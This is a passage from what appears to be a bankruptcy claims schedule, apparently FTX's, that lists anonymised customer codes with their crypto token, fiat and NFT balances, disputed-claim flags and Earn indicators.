| 07420138 | | BTC[.00009338], LTC[.00646], SUSHI[.419], TRX[.525] | | |
| 07420143 | | GRT[.6959], SOL[.0063995], TRX[.53985], USD[295.74] | | |
| 07420145 | | AAVE[.08006405], CUSDT[1], USD[0.99] | Yes | |
| 07420148 | | SOL[0], USD[0.00] | | |
| 07420153 | | BCH[.01851588], BTC[.0007373], CUSDT[11], DOGE[516.39416985], ETH[.00338334], ETHW[.0033423], LTC[.0150136], SOL[2.18516009], TRX[2], USD[0.69], USDT[0.89411160] | Yes | |
| 07420154 | | BRZ[78.78883284], CUSDT[3], DAI[4.95618641], DOGE[1], LINK[1.20575834], USD[3.50], USDT[44.67689046] | | |
| 07420157 | | CUSDT[1], DOGE[224.34285390], ETH[.00000001], ETHW[0], GRT[0], LINK[0.00003377], SUSHI[0.00004408] | | |
| 07420164 | Contingent, Disputed | CUSDT[1], DOGE[1], USD[57.01], USDT[1] | | |
| 07420166 | | DOGE[1], SHIB[1], USD[0.00] | | |
| 07420167 | | USD[0.00] | | |
| 07420168 | | BTC[0], DOGE[0], SOL[0.00083841], TRX[0], USD[0.00] | | |
| 07420171 | | BRZ[2], BTC[.01304958], CUSDT[17], DOGE[172.74035487], ETH[.40153875], ETHW[.40153875], LINK[6.17996015], LTC[2.05431829], SOL[14.94879917], TRX[7], UNI[6.20428049], USD[0.00] | | |
| 07420173 | | BRZ[3], CUSDT[4], DOGE[7.00134263], ETH[.00000007], ETHW[0.00809350], SHIB[1], USD[221.27], USDT[.00111855] | Yes | |
| 07420178 | | CUSDT[2], DOGE[.24025662], USD[0.00] | | |
| 07420189 | | CUSDT[1], USD[0.00] | | |
| 07420190 | | CUSDT[3], DOGE[73.48311568], USD[0.00] | | |
| 07420191 | | BTC[0.00035944], DOGE[1], NFT [3245199915251674479/Vintage Sahara #182 (Redeemed)][1], SOL[.019], USD[48.13], USDT[1] | | |
| 07420199 | Contingent, Disputed | GRT[.653], USD[0.01] | | |
| 07420201 | | CUSDT[1], DOGE[2.65006836], USD[0.67] | | |
| 07420204 | | CUSDT[1], SHIB[1], TRX[1377.89249375], USD[0.00] | Yes | |
| 07420205 | | BTC[0], DOGE[0.44000000], ETH[0], ETHW[0], SOL[0], SUSHI[0], TRX[0.05480821], USD[0.00], USDT[0] | | |
| 07420209 | | BAT[2.10655419], BRZ[7.72018318], BTC[.00000426], CUSDT[13], DOGE[3.03035696], ETH[0], GRT[2.07640377], KSHIB[0], LINK[6.23898683], LTC[.00260963], USD[0.00], USDT[1.10551887] | Yes | |
| 07420215 | | BAT[1.01062219], CUSDT[5], DOGE[0], ETH[0], NFT [4667706116696936694/Miami Ticket Stub #568][1], TRX[1133.2265522], USD[0.00] | Yes | |
| 07420216 | | BRZ[1], CUSDT[6], ETH[0], ETHW[0], GRT[0], SUSHI[0], TRX[1], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07420220 | | CUSDT[1], USD[0.00], USDT[0] | | |
| 07420225 | | BTC[0], ETH[0], SHIB[1.09124795], USD[0.01], USDT[0] | Yes | |
| 07420236 | | CUSDT[1], DOGE[5196.95158032], TRX[1], USD[0.00] | | |
| 07420237 | | BAT[1], BRZ[3], CUSDT[2], DOGE[2], GRT[5], SHIB[2.00000004], SUSHI[1], TRX[1], USD[0.00], USDT[0] | | |
| 07420238 | | BRZ[4], CUSDT[8], GRT[2.07609649], TRX[3], USD[0.00], USDT[1.10124118] | Yes | |
| 07420241 | | BRZ[1], CUSDT[1], DOGE[3], USD[0.00] | | |
| 07420245 | | TRX[1], USD[0.00], USDT[0] | | |
| 07420251 | | BTC[0], LINK[.00004524], MATIC[.00075498], USD[0.01], USDT[0] | Yes | |
| 07420252 | | DOGE[.834], LTC[0], TRX[.000002], USD[0.34], USDT[0] | | |
| 07420256 | | BRZ[2], DOGE[1], SOL[.12633258], USD[23.36] | | |
| 07420258 | | ETH[.00000034], ETHW[.00000034], USD[0.01] | | |
| 07420276 | | ETH[0], ETHW[0], TRX[2.46788581], YFI[0] | | |
| 07420283 | | BAT[35.70572681], BCH[1.78696915], BRZ[14.12905768], CUSDT[8.45478515], DOGE[207707.16557271], ETH[.48146309], ETHW[.4812827], GRT[3129.3586437], LINK[32.70216693], LTC[3.22052976], MATIC[25.38957906], MKR[.00334738], SHIB[40913993.3599719], SOL[3.27515775], SUSHI[338.54678202], TRX[2488.53341182], UNI[16.32797681], USD[0.00], USDT[3.19142042] | Yes | |
| 07420288 | | CUSDT[3], USD[46.46] | | |
| 07420294 | | USD[16.41] | | |
| 07420300 | | BCH[.0052902], USD[2.75] | Yes | |
| 07420306 | | DOGE[2], USD[0.00] | | |
| 07420307 | | BRZ[1], BTC[.00145953], CUSDT[3], DOGE[2], ETH[.00000001], ETHW[0], TRX[4], USD[0.01], USDT[.0340095] | Yes | |
| 07420309 | | BRZ[1], CUSDT[27], TRX[4], USD[0.01] | Yes | |
| 07420310 | | CUSDT[1], SUSHI[0], USD[0.01] | | |
| 07420315 | Contingent, Disputed | BTC[.00000697], CUSDT[1], DOGE[1], USD[0.00] | | |
| 07420327 | | DOGE[0], NFT [4452620000005519838/Entrance Voucher #2490][1], NFT [495376797013122236/Imola Ticket Stub #1306][1], SHIB[1], TRX[1], UNI[.00001597], USD[0.02], USDT[0] | Yes | |
| 07420339 | | BAT[142.31073016], BRZ[5.07952967], CUSDT[8], DOGE[5143.18899219], ETH[0], GRT[1.00498957], LINK[20.92448672], TRX[10.1079756], USD[0.42], USDT[1.10378858] | Yes | |
| 07420342 | | CUSDT[2], DOGE[140.73255573], ETH[.04683132], ETHW[.04683132], USD[0.00] | | |
| 07420343 | | SOL[.0882], USD[0.00] | | |
| 07420344 | | BTC[0.00008384], PAXG[.00000001], USD[0.00], USDT[0.00011593] | | |
| 07420345 | | CUSDT[2], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07420355 | | DOGE[1], TRX[281.04855844], USD[0.00] | | |
| 07420359 | | BTC[.00000912], SUSHI[223.61397101] | | |
| 07420360 | | BTC[.09058619], UNI[1], USD[0.00] | | |
| 07420361 | | USD[0.00] | | |
| 07420370 | | BTC[.00014632], DOGE[100.33982031], USD[0.00] | | |
| 07420371 | | BAT[1], BTC[.26765505], DOGE[1], USD[0.00], USDT[1] | | |
| 07420376 | | BAT[2.08649341], BRZ[1], CUSDT[4], DOGE[794.02525977], ETH[0], SUSHI[.00004047], TRX[1.0004868], UNI[.00009519], USD[0.00], USDT[2.17283471] | Yes | |
| 07420384 | | USD[0.02] | Yes | |
| 07420385 | | TRX[1], USD[0.19] | | |
| 07420388 | | ETH[0], ETHW[0.00001921], MATIC[0.00053042], SHIB[2], SOL[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07420392 | | BRZ[4], CUSDT[3], DOGE[1], TRX[3], USD[0.42] | | |
| 07420395 | | BCH[0], BTC[0], DOGE[213.96841090], ETH[0], LTC[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], YFI[0] | | |
| 07420396 | | BRZ[1], CUSDT[1], DOGE[760.23101199], TRX[1], USD[0.04] | | |
| 07420400 | | DOGE[568.75031741], ETHW[.037], SOL[3.03399800], TRX[0], UNI[0], USD[0.00] | | |
| 07420403 | | ETH[.02094039], ETHW[.02068028], SHIB[1], USD[0.00] | Yes | |
| 07420411 | | BAT[59.99997434], BTC[.00064428], CUSDT[4], DOGE[149.99996794], ETH[.01409333], ETHW[.01409333], TRX[3], USD[22.24] | | |
| 07420412 | | SOL[0], USD[1.62] | | |
| 07420415 | | BRZ[1], CUSDT[1], ETHW[6.02282599], USD[0.00] | Yes | |
| 07420419 | | BTC[.00008375], DOGE[0], ETH[0.00010327], ETHW[0.00010327], USD[0.00] | | |
| 07420425 | | ETH[0], USD[0.16] | | |
| 07420428 | | SHIB[20038.51104612], USD[0.00] | Yes | |
| 07420430 | | BAT[1.0165555], BF_POINT[700], BRZ[2], BTC[0], CUSDT[1], DOGE[4.0445197], ETH[0], TRX[0], USD[0.51], USDT[1.10406761] | Yes | |
| 07420431 | | USD[0.00] | | |
| 07420435 | | NFT (500108252162551213/FTX - Off The Grid Miami #564)[1] | | |
| 07420436 | | DOGE[0], USD[0.00] | | |
| 07420439 | | USD[0.01] | | |
| 07420440 | | USD[0.42] | | |
| 07420442 | | USD[500.00] | | |
| 07420448 | | DOGE[5], GRT[1], USD[0.46], USDT[0] | | |
| 07420457 | | ETH[0], USD[0.00] | | |
| 07420461 | | SUSHI[26.394], USD[4.21] | | |
| 07420463 | | BTC[0], GRT[0], TRX[0], USD[0.00] | | |
| 07420465 | | BAT[1], BRZ[1.57787544], CUSDT[5], DOGE[9719.04269657], GRT[1], TRX[1053.8866295], USD[0.64], USDT[1] | | |
| 07420472 | | NFT (514181672330599933/Entrance Voucher #4376)[1], NFT (570520238951782262/Miami Ticket Stub #664)[1], USD[0.00] | | |
| 07420474 | | BRZ[3], CUSDT[19], ETH[0], GRT[1], SOL[0], TRX[0], USD[0.00], USDT[.42086155] | | |
| 07420479 | | USD[0.00] | Yes | |
| 07420480 | | CUSDT[1], SUSHI[0], TRX[1], UNI[0] | | |
| 07420493 | | DOGE[512.81784044], USD[0.00] | | |
| 07420497 | | DAI[0], ETH[0.07718003], ETHW[0.07622313], KSHIB[18.70702731], SOL[0.00001335], USD[0.00] | Yes | |
| 07420501 | | USD[1.82] | | |
| 07420512 | | BTC[0], DAI[0], LTC[0], USD[0.00], USDT[0] | | |
| 07420520 | | BTC[0], ETH[0], LINK[0], SOL[0], SUSHI[0], USD[0.00], YFI[0] | | |
| 07420535 | | BRZ[1], DOGE[3.000548], TRX[18633.79588063], USD[84.29] | Yes | |
| 07420538 | | BRZ[5142.99068887], BTC[.48769628], CUSDT[9], DOGE[3673.01536715], ETH[1.17670188], ETHW[1.17625249], GRT[2.08038475], SHIB[2], SOL[2.1720734], TRX[9027.81105251], USD[229.14], USDT[3.17316077] | Yes | |
| 07420539 | | BTC[0], USD[0.00] | | |
| 07420540 | | BRZ[1], CUSDT[1], DOGE[756.04580081], USD[0.00] | | |
| 07420544 | | BTC[.0017639], DOGE[3], SUSHI[7.00542049], USD[0.00] | | |
| 07420545 | | USD[0.01] | | |
| 07420549 | | BTC[0], USD[0.00] | | |
| 07420554 | | BAT[.00085369], BRZ[1], CUSDT[3], DOGE[1.67065071], TRX[1], USD[0.01] | | |
| 07420572 | | USD[2.92] | | |
| 07420575 | | BTC[0.00003020], USD[2.22] | | |
| 07420578 | | BRZ[2], CUSDT[2], DOGE[1], LINK[1], SOL[2.14496843], TRX[2], USD[0.00] | | |
| 07420580 | | ETH[0], TRX[.000006], USD[0.00], USDT[0.00001558] | | |
| 07420595 | | DOGE[11950.55358299], USD[0.04], USDT[0] | | |
| 07420599 | | BTC[0.00009751], SHIB[2], USD[0.00] | Yes | |
| 07420601 | | SOL[.7960647], USD[0.00] | | |
| 07420605 | | DOGE[0], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07420606 | | DAI[.0070983], ETH[.00000001], USD[0.30] | | |
| 07420609 | | CUSDT[1], USD[0.00] | | |
| 07420617 | | BAT[1], DOGE[.90315061], TRX[10.09578487], USD[0.00] | | |
| 07420623 | | ETH[0.05233132], ETHW[0.05233132], USD[2.06] | | |
| 07420628 | | USDT[7.441798] | | |
| 07420633 | | BAT[1], BRZ[1], CUSDT[2], SOL[0.10786611], TRX[1], USD[0.00] | | |
| 07420637 | | USD[149.00] | | |
| 07420641 | | BAT[1], BTC[0], CUSDT[1], DOGE[1], GRT[2], TRX[5], USD[0.00], USDT[0] | | |
| 07420643 | | USD[0.00] | | |
| 07420647 | | SHIB[3267186.67829481], USD[0.00], USDT[0] | | |
| 07420649 | | ETH[0], SHIB[1], USD[1.33] | Yes | |
| 07420652 | | ETH[0], ETHW[0] | | |
| 07420654 | | CUSDT[5], MATIC[.00748145], SHIB[2], USD[0.00] | Yes | |
| 07420658 | | BAT[1], ETH[.0000537], ETHW[.0000537], GRT[2], TRX[3], USD[2639.96] | | |
| 07420672 | | BAT[10.00115563], BCH[.09179545], BTC[.00074454], CAD[3.86], CUSDT[258.6155206], DOGE[12.76057821], ETH[.02588539], ETHW[.02556438], LINK[2.07620304], LTC[.15586447], PAXG[.01206865], SHIB[126663.71576063], SOL[1.01338934], SUSHI[.82512361], TRX[198.28196144], USD[0.44], USDT[5.36208714] | Yes | |
| 07420681 | | SOL[.0039], SUSHI[.999], USD[2.61] | | |
| 07420691 | | USD[0.00], USDT[0] | | |
| 07420692 | | BRZ[1], DOGE[2], LINK[1.09242651], USD[0.00], USDT[1.09241653] | Yes | |
| 07420694 | Contingent, Disputed | BTC[.00005146], CUSDT[1], TRX[1], USD[0.82] | | |
| 07420695 | | DOGE[.00011883], ETHW[0], GRT[.00000913], SOL[0], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07420698 | | AVAX[4], USD[1.41] | | |
| 07420709 | | USD[7.60] | | |
| 07420715 | | SOL[.00096], USD[1.40] | Yes | |
| 07420719 | | BTC[.0000256], ETH[.04143423], ETHW[.04143422], NFT [311143346427226375/GSW 75 Anniversary Diamond  #668 (Redeemed)][1], NFT [337078673070287449/GSW Round 1 Commemorative Ticket #576][1], NFT [367202185528002582/GSW Western Conference Finals Commemorative Banner #988][1], NFT [373873391140744291/GSW Western Conference Semifinals Commemorative Ticket #512][1], NFT [396929071985524803/GSW Round 1 Commemorative Ticket #290][1], NFT [397589541772606983/GSW Championship Commemorative Ring][1], NFT [406168384524166603/Warriors Logo Pin #95 (Redeemed)][1], NFT [513811197031340735/GSW Western Conference Semifinals Commemorative Ticket #513][1], NFT [531789874380724781/GSW Western Conference Finals Commemorative Banner #987][1], NFT [547873702996967196/GSW Western Conference Finals Commemorative Banner #986][1], NFT [560276619738990385/GSW Championship Commemorative Ring][1], NFT [565083127819121275/GSW Western Conference Finals Commemorative Banner #985][1], SOL[0.00758626], USD[19.14], USDT[0] | | |
| 07420722 | | BTC[.00036182] | | |
| 07420726 | | USD[0.00], USDT[0] | | |
| 07420729 | | BTC[.00130232] | | |
| 07420730 | | BTC[.00000112], ETH[.0007813], ETHW[.0007813], LINK[.0325], MATIC[4.34367885], SHIB[68600], SOL[.00595079], USD[0.00], USDT[0.69531680] | | |
| 07420735 | | CUSDT[2.0000191], SHIB[9572323.50541136], TRX[1], USD[0.00] | | |
| 07420736 | | BAT[2.13212571], BRZ[6.66045759], CUSDT[25], USD[0.00], USDT[0] | Yes | |
| 07420739 | | ETH[.00000001] | | |
| 07420745 | | CUSDT[1], DOGE[418.66090555], USD[0.00] | | |
| 07420747 | | BTC[0], DOGE[0], TRX[1] | | |
| 07420751 | | CUSDT[1], DOGE[1], ETH[0], LTC[0], TRX[1], USD[0.00] | | |
| 07420758 | | SOL[1.33321093], USD[3.20] | | |
| 07420760 | | BTC[0.01953265], ETH[.44286638], ETHW[.44268458], LTC[.00196529], SOL[46.55049319], USD[618.83] | | |
| 07420763 | | CUSDT[2], DOGE[0], MATIC[1096.89999884], SOL[15.71352699], TRX[1], USD[0.00], USDT[1.06945627] | Yes | |
| 07420764 | | USD[0.65] | | |
| 07420767 | | SOL[0], USD[0.00], USDT[0] | | |
| 07420769 | | DOGE[4.7775], SOL[.015581], USD[0.45] | | |
| 07420773 | | BTC[.01147131], CUSDT[27], DOGE[4910.22878399], ETH[.29780964], ETHW[.29761108], LTC[5.43013114], MATIC[100.63152685], SHIB[8121677.76243191], TRX[1166.57527191], USD[0.00], USDT[0.00046895] | Yes | |
| 07420782 | | SHIB[1], TRX[576.81049356], USD[72.24] | Yes | |
| 07420797 | | BRZ[2], BTC[.01156932], CUSDT[26], DOGE[2592.54139673], ETH[.14528313], ETHW[.14438538], LINK[2.53084953], SHIB[1101995.97080426], SOL[.50745758], SUSHI[13.37746294], TRX[2446.84703744], USD[0.00] | Yes | |
| 07420799 | | BTC[.0000178], USD[1.00] | | |
| 07420801 | | USD[0.00] | | |
| 07420816 | | DOGE[298.701], ETH[0], USD[0.31] | | |
| 07420817 | | BTC[0], DOGE[2.44174428], ETH[0.04412299], ETHW[0.04412299], LINK[0], USD[0.00], USDT[0] | | |
| 07420824 | | BRZ[1], USD[131.70] | | |
| 07420828 | | ETH[0], SHIB[3], USD[148.65] | Yes | |
| 07420831 | | CUSDT[2], DOGE[196.55346942], TRX[1090.39243245], USD[0.00] | Yes | |
| 07420836 | | USD[9.51] | | |
| 07420839 | | BAT[1.01655549], BRZ[5.07952967], CUSDT[5], DOGE[149.61589337], GRT[2.08609336], SHIB[1], TRX[3], USD[12.71], USDT[1.11056299] | Yes | |
| 07420846 | | NFT [375292761058290193/Cyber Pharmacist 2544][1], NFT [542358752649390495/ApexDucks #4398][1], SOL[.02451381], USD[0.00], USDT[0] | | |
| 07420847 | | BRZ[1], BTC[.0058324], CUSDT[1], DOGE[1], LTC[.88721208], TRX[2], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07420854 | | SUSHI[14.943], USD[0.00], USDT[.004894] | | |
| 07420855 | | BAT[9.76605343], BRZ[21.6753931], BTC[0.00916123], CUSDT[50.36523797], DOGE[73938.69425828], ETH[4.34055211], ETHW[4.33885044], GRT[124.98541505], LINK[3.54636756], LTC[1.14713171], MATIC[143.48973378], SHIB[7], SOL[61.21489250], TRX[3546.49899135], UNI[1.0851173S], USD[1201.83], USDT[8.13837796] | Yes | |
| 07420857 | Contingent, Disputed | BTC[0], DOGE[0], ETH[0], LTC[0], USD[2.88], USDT[0] | | |
| 07420858 | | ETH[.00000001], MATIC[.00000001], TRX[.000006], USD[0.00], USDT[0] | | |
| 07420860 | | ETH[.01856345], ETHW[.01833089] | | |
| 07420869 | | BTC[0.00152970], CUSDT[3], DOGE[0.00077310], USD[0.44] | Yes | |
| 07420870 | | CUSDT[1], DOGE[2], TRX[945.07325474], USD[0.00] | Yes | |
| 07420872 | | CUSDT[1], DOGE[1], GRT[1], USD[0.01] | | |
| 07420874 | | BTC[0], DOGE[208.67154094], USD[0.00], USDT[0.00001008] | Yes | |
| 07420879 | | BTC[.00003242], USD[0.00] | | |
| 07420884 | | BRZ[2], CUSDT[13], DOGE[167.98465383], TRX[2], USD[0.00] | Yes | |
| 07420895 | | AVAX[0], BAT[0], BCH[0], BTC[0], DAI[0], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[0], LTC[0], MATIC[0.00000001], MKR[0], SHIB[59], SOL[0], SUSHI[0], TRX[3], UNI[0], USD[0.01], USDT[0.00000267], YFI[0] | Yes | |
| 07420897 | | SOL[.00165937], USD[0.00], USDT[0] | | |
| 07420903 | | BCH[0], BRZ[0], BTC[0], CUSDT[1], DOGE[1], ETH[0], ETHW[0], GRT[0], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.01] | | |
| 07420908 | | USD[7.25] | | |
| 07420917 | | CUSDT[1], DOGE[1], TRX[2], USD[0.98], USDT[1] | | |
| 07420919 | | CUSDT[1], DOGE[4], USD[0.00] | | |
| 07420921 | | USD[100.00] | | |
| 07420926 | | BAT[3], CUSDT[2], DOGE[2385.647161571], ETH[.0000327], ETHW[.0000327], GRT[2], TRX[4], USD[0.89] | | |
| 07420940 | | BRZ[2], CUSDT[3], GRT[2.00450321], LTC[3.26131087], USD[0.00] | Yes | |
| 07420943 | | USD[0.00] | | |
| 07420945 | | BAT[1.0165555], BRZ[2], CUSDT[2], DOGE[1], GRT[3.14949517], TRX[3], USD[0.03], USDT[1.09527354] | Yes | |
| 07420946 | | SHIB[2] | | |
| 07420956 | | TRX[1], USD[0.00] | | |
| 07420978 | Contingent, Disputed | DOGE[1], USD[0.52] | | |
| 07420982 | | BTC[0], DOGE[0], ETH[0], SOL[0], UNI[0], USD[1.78] | | |
| 07420983 | | AAVE[10.24004008], ALGO[7712.44526543], AVAX[61.29835574], BAT[1214.74697190], BCH[.52938188], BRZ[43.17289325], BTC[0.02062515], CUSDT[100.15660297], DAI[.00035246], DOGE[1601.69005632], ETH[0.17125532], ETHW[0.17104161], GRT[7838.26955327], KSHIB[20000.74271705], LINK[204.32770156], LTC[0.12045198], MATIC[4086.54588425], MKR[0.05292739], NEAR[612.98090871], PAXG[.00005597], SHIB[25828725.97324647], SOL[15.32450970], SUSHI[103.43814483], TRX[8173.07869321], UNI[512.00181429], USD[10321.89], USDT[8.76305389], YFI[0.05119973] | Yes | |
| 07420992 | | BAT[1], CUSDT[2], TRX[2], USD[0.00] | Yes | |
| 07420999 | | CUSDT[4], GRT[1], TRX[165.80458572], USD[0.01] | | |
| 07421005 | | USD[0.96] | | |
| 07421007 | | BRZ[1], CUSDT[3], DOGE[314.94993538], USD[0.00] | | |
| 07421011 | | BTC[0], ETH[0], ETHW[0.85147907], SOL[0], USD[61.29], USDT[0] | | |
| 07421013 | | USD[4.38] | | |
| 07421026 | | USD[100.00] | | |
| 07421030 | | CUSDT[1], USD[0.00] | Yes | |
| 07421044 | | BRZ[1], CUSDT[7], DOGE[1], USD[0.01], USDT[0] | Yes | |
| 07421045 | | DOGE[0], ETH[0], USD[0.00] | | |
| 07421048 | | CUSDT[1], LINK[3.4938552], USD[0.00] | Yes | |
| 07421051 | | TRX[.000007], USD[0.00] | | |
| 07421053 | | BTC[0], CUSDT[4], DOGE[0], ETH[0], SOL[0], TRX[1], USD[0.00] | | |
| 07421057 | | BTC[0], ETH[0], USD[1.45] | | |
| 07421062 | | CUSDT[5], DOGE[37.97017943], SOL[.16431988], TRX[1], USD[3.58] | Yes | |
| 07421065 | | BAT[0], BTC[0], CUSDT[120.18955128], DOGE[112.32587854], GBP[1.96], SUSHI[.89346292], USD[0.00], USDT[2.48705028] | | |
| 07421066 | | BTC[.0001604], DOGE[255.5929479], ETH[.00360709], ETHW[.00356602], SOL[.3360454], USD[0.00] | Yes | |
| 07421072 | | USD[500.00] | | |
| 07421073 | | CUSDT[0], GRT[0], USD[0.23], USDT[0] | | |
| 07421075 | | DOGE[0], LTC[0], SUSHI[0] | | |
| 07421083 | | BTC[.0000377], ETH[.000208], ETHW[.000208], NEAR[.0744], SOL[.0073], USD[0.00], USDT[0] | | |
| 07421090 | | DOGE[11014.64688454], SHIB[1184489.21452499], USD[0.00] | | |
| 07421092 | | TRX[3], USD[0.00] | | |
| 07421097 | | ETH[0], USD[0.00] | | |
| 07421099 | | DOGE[.00098016], TRX[.000002], USD[0.00] | | |
| 07421102 | | CUSDT[1], DOGE[389.86020398], USD[0.01] | Yes | |
| 07421112 | | USD[0.48] | | |
| 07421120 | | BTC[0.00426592], SOL[16.268] | | |
| 07421122 | | BRZ[2], SOL[232.5071554], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07421125 | | DAI[.082], USD[25.74], USDT[1.1256] | | |
| 07421128 | | BTC[0], LINK[0], SOL[0], SUSHI[0], USD[0.00] | | |
| 07421130 | | USD[0.00], USDT[0.00000002] | Yes | |
| 07421134 | | BRZ[1], CUSDT[2], DOGE[1], GRT[.00748716], SHIB[1], SOL[0], TRX[1], USD[47.54] | Yes | |
| 07421138 | | AVAX[3.55022999], DOGE[1606.56988344], USD[5.00] | | |
| 07421147 | | ETH[.00001], ETHW[.00001], TRX[.998], USD[1.10], USDT[34.39454607] | | |
| 07421148 | | BAT[3008.72195074], BRZ[1], CUSDT[2], DOGE[37412.3348404], ETH[1.20054814], ETHW[1.20054814], LINK[198.65738962], LTC[8.83071089], SHIB[25137697.77476135], SOL[154.141411], SUSHI[88.7179837], TRX[6], USD[0.00], USDT[1] | | |
| 07421160 | | BTC[0], ETH[0], LTC[0], MATIC[.6143897], SOL[0], USD[4.58] | | |
| 07421161 | | BAT[1], BRZ[1], DOGE[.02329161], USD[0.00] | | |
| 07421166 | | USD[0.00] | | |
| 07421168 | | DOGE[4908.67563769], TRX[1] | | |
| 07421171 | | BAT[2.11579266], BRZ[4], BTC[0], CUSDT[2], DOGE[1.13507492], GRT[2.0689222], NFT [403516681982532173/Degen Banana #3356][1], NFT [434329650719033192/Degen Ape #9563][1], SOL[0.00025020], SUSHI[1.09648893], TRX[5], USD[0.00], USDT[1.07985924] | Yes | |
| 07421176 | | BTC[0], GRT[0], LTC[0], USD[0.70] | | |
| 07421178 | | BTC[0], DOGE[0], TRX[.584], USD[1.63], USDT[0.51731312] | | |
| 07421182 | | BTC[0], ETH[0], SOL[.00000001], UNI[0], USD[0.00], USDT[0] | | |
| 07421197 | | DOGE[.844], LTC[.00798], TRX[.236], USD[0.05], USDT[2.54146570] | | |
| 07421200 | | BTC[.00017619], DOGE[9.87251697], USD[10.00] | | |
| 07421202 | | BTC[0.25436170], ETH[1.45210481], ETHW[1.45210481], SOL[615.49446], TRX[.000006], USD[10.78], USDT[0] | | |
| 07421208 | | BRZ[1], CUSDT[4], DOGE[59.06995674], ETH[.09774491], ETHW[.09774491], USD[0.00] | | |
| 07421215 | | ETHW[.182], SOL[2.82], USD[4.72] | | |
| 07421216 | | DOGE[5663] | | |
| 07421217 | | DOGE[.1868], SHIB[10940000], USD[1.17] | | |
| 07421221 | | BTC[.00003453], SOL[0.00115000], USD[0.01], USDT[0] | | |
| 07421222 | | BTC[.00002985], USD[1.19] | | |
| 07421224 | | ETH[0], SOL[0], USD[0.00], USDT[0] | | |
| 07421225 | | BAT[2.09765021], BRZ[6.57490493], CUSDT[13], DOGE[18.58868], ETH[0], GRT[2.0576061], LINK[2.16297928], SOL[0], SUSHI[1.06758277], TRX[17.34877409], USD[0.00], USDT[3.27991118] | Yes | |
| 07421228 | | BTC[0], SOL[0.10000000] | | |
| 07421231 | | USD[0.75] | Yes | |
| 07421232 | | BTC[0], CUSDT[1], USD[0.00] | Yes | |
| 07421235 | | USD[0.00], USDT[0.28330436] | | |
| 07421236 | | BTC[0], USD[0.00] | | |
| 07421237 | | BCH[0.00000161], DOGE[0.02147445], ETH[.00000104], ETHW[.00000104], LTC[.00000075], PAXG[0], SHIB[19.41236296], TRX[1], USD[0.01], USDT[0] | Yes | |
| 07421243 | | USD[3.40] | Yes | |
| 07421247 | | BTC[0], LTC[0], USD[0.00] | | |
| 07421248 | | DOGE[447.70035238], ETH[.09573818], ETHW[0.09469875], MATIC[176.40611837], SHIB[3], SOL[5.81730699], USD[0.00] | Yes | |
| 07421250 | | USD[0.00], USDT[0] | Yes | |
| 07421255 | Contingent, Disputed | SOL[0.05680000], USD[0.09], USDT[1.89280400] | | |
| 07421257 | | CUSDT[1], DOGE[51.56626276], TRX[2], USD[0.01] | | |
| 07421258 | | CUSDT[1], DOGE[3.04562788], ETH[.0005443], ETHW[.0005443], GRT[1], USD[0.09] | | |
| 07421259 | | CUSDT[1], USD[0.00] | | |
| 07421262 | | USD[0.00] | | |
| 07421264 | | SOL[.0769335], USD[0.17], USDT[0.00571292] | | |
| 07421276 | | TRX[2], USD[0.00] | | |
| 07421278 | | BTC[.00000148] | | |
| 07421279 | | MATIC[679.32], MKR[.0007], SUSHI[150.175], USD[894.85] | | |
| 07421288 | | USD[0.00] | | |
| 07421289 | | CUSDT[3], DOGE[1], LTC[0], SOL[0], SUSHI[0], TRX[1], USD[0.00] | Yes | |
| 07421293 | | BTC[.0373153], TRX[1], USD[0.00] | Yes | |
| 07421294 | | BTC[1.06374267], ETH[7.433352], ETHW[7.433352], GRT[569], USD[28.66], YFI[.015] | | |
| 07421300 | | USD[0.00] | | |
| 07421301 | | BTC[0], USD[0.00] | | |
| 07421309 | | TRX[1], USD[0.00], USDT[82.85915603] | Yes | |
| 07421315 | | BRZ[1], BTC[0], CUSDT[11], DOGE[52.52859264], ETH[.04446372], ETHW[.04391369], USD[0.71] | Yes | |
| 07421318 | | USD[25.00] | | |
| 07421321 | | BTC[.00353848], CUSDT[23], DOGE[238.96795147], ETH[.09602563], ETHW[.09498617], GRT[310.44084299], MATIC[21.77226191], SHIB[505483.76386024], TRX[872.88414591], USD[1.16], USDT[0] | Yes | |
| 07421322 | | CUSDT[5], DOGE[73.81970679], TRX[1], USD[0.30] | | |
| 07421323 | | USD[225.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07421325 | | CUSDT[1], DOGE[298.98162384], SOL[2.11936448], TRX[500.10881311], USD[0.10] | Yes | |
| 07421326 | | BTC[0], USD[0.02] | | |
| 07421330 | | ETH[.00271001], ETHW[.00268263], USD[0.06] | Yes | |
| 07421340 | | BRZ[1], BTC[.00007649], DOGE[176.15908715], ETH[.00084565], ETHW[.00084565], MATIC[91.06350149], USD[5.00] | | |
| 07421342 | | DOGE[8], USD[0.02] | | |
| 07421347 | | CUSDT[3], USD[0.00] | | |
| 07421352 | | USDT[5.6275] | | |
| 07421355 | | USD[548.26] | Yes | |
| 07421359 | | BRZ[1], SOL[3.81342188], SUSHI[2.70917551], TRX[1], USD[0.00] | Yes | |
| 07421361 | | USD[0.81] | | |
| 07421364 | | BAT[45.91397572], BTC[.00000291], DOGE[4243.94397443], TRX[1], USD[9.00] | | |
